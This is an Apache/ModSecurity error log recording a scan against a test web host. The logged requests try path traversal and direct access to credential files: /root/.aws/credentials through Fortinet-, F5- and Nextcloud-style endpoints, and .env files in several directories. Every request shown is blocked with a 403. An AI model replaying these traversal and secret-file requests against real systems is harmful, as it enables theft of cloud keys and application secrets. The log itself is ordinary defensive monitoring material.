[Sun Jun 08 02:26:17.710558 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYqRHYI3qyoazfXO0cVAAAAAc"]
[Sun Jun 08 02:26:17.710619 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYqRHYI3qyoazfXO0cVAAAAAc"]
[Sun Jun 08 02:26:17.710659 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYqRHYI3qyoazfXO0cVAAAAAc"]
[Sun Jun 08 02:26:17.711075 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYqRHYI3qyoazfXO0cVAAAAAc"]
[Sun Jun 08 02:26:17.711228 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/remote/fgt_lang"] [unique_id "aETYqRHYI3qyoazfXO0cVAAAAAc"]
[Sun Jun 08 02:26:19.266949 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqxHYI3qyoazfXO0cVQAAAAc"]
[Sun Jun 08 02:26:19.267158 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqxHYI3qyoazfXO0cVQAAAAc"]
[Sun Jun 08 02:26:19.267320 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYqxHYI3qyoazfXO0cVQAAAAc"]
[Sun Jun 08 02:26:20.694561 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /mgmt/shared/authn/login/root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aETYrBHYI3qyoazfXO0cVgAAAAc"]
[Sun Jun 08 02:26:20.694747 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aETYrBHYI3qyoazfXO0cVgAAAAc"]
[Sun Jun 08 02:26:20.694902 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aETYrBHYI3qyoazfXO0cVgAAAAc"]
[Sun Jun 08 02:26:21.771817 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYrRHYI3qyoazfXO0cVwAAAAc"]
[Sun Jun 08 02:26:21.771990 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYrRHYI3qyoazfXO0cVwAAAAc"]
[Sun Jun 08 02:26:21.772136 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYrRHYI3qyoazfXO0cVwAAAAc"]
[Sun Jun 08 02:26:22.781532 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrhHYI3qyoazfXO0cWAAAAAc"]
[Sun Jun 08 02:26:22.781596 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrhHYI3qyoazfXO0cWAAAAAc"]
[Sun Jun 08 02:26:22.781629 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrhHYI3qyoazfXO0cWAAAAAc"]
[Sun Jun 08 02:26:22.782146 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrhHYI3qyoazfXO0cWAAAAAc"]
[Sun Jun 08 02:26:22.782327 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aETYrhHYI3qyoazfXO0cWAAAAAc"]
[Sun Jun 08 02:26:23.891917 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aETYrxHYI3qyoazfXO0cWQAAAAc"]
[Sun Jun 08 02:26:23.892378 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aETYrxHYI3qyoazfXO0cWQAAAAc"]
[Sun Jun 08 02:26:23.892521 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aETYrxHYI3qyoazfXO0cWQAAAAc"]
[Sun Jun 08 02:26:25.177752 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aETYsRHYI3qyoazfXO0cWgAAAAc"]
[Sun Jun 08 02:26:25.177933 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aETYsRHYI3qyoazfXO0cWgAAAAc"]
[Sun Jun 08 02:26:25.178163 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aETYsRHYI3qyoazfXO0cWgAAAAc"]
[Sun Jun 08 02:26:26.613107 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aETYshHYI3qyoazfXO0cWwAAAAc"]
[Sun Jun 08 02:26:26.613289 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aETYshHYI3qyoazfXO0cWwAAAAc"]
[Sun Jun 08 02:26:26.613429 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aETYshHYI3qyoazfXO0cWwAAAAc"]
[Sun Jun 08 02:26:37.609137 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aETYvf1_TH61fgprOmdtbgAAAAA"]
[Sun Jun 08 02:26:37.609348 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aETYvf1_TH61fgprOmdtbgAAAAA"]
[Sun Jun 08 02:26:37.609519 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aETYvf1_TH61fgprOmdtbgAAAAA"]
[Sun Jun 08 02:26:38.465158 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aETYvv1_TH61fgprOmdtbwAAAAA"]
[Sun Jun 08 02:26:38.465371 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aETYvv1_TH61fgprOmdtbwAAAAA"]
[Sun Jun 08 02:26:38.465550 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aETYvv1_TH61fgprOmdtbwAAAAA"]
[Sun Jun 08 02:26:39.397402 2025] [authz_core:error] [pid 3707672] [client 107.150.0.115:46684] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sun Jun 08 02:26:40.367718 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aETYwP1_TH61fgprOmdtcQAAAAA"]
[Sun Jun 08 02:26:40.367927 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aETYwP1_TH61fgprOmdtcQAAAAA"]
[Sun Jun 08 02:26:40.368137 2025] [:error] [pid 3707672] [client 107.150.0.115:46684] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aETYwP1_TH61fgprOmdtcQAAAAA"]
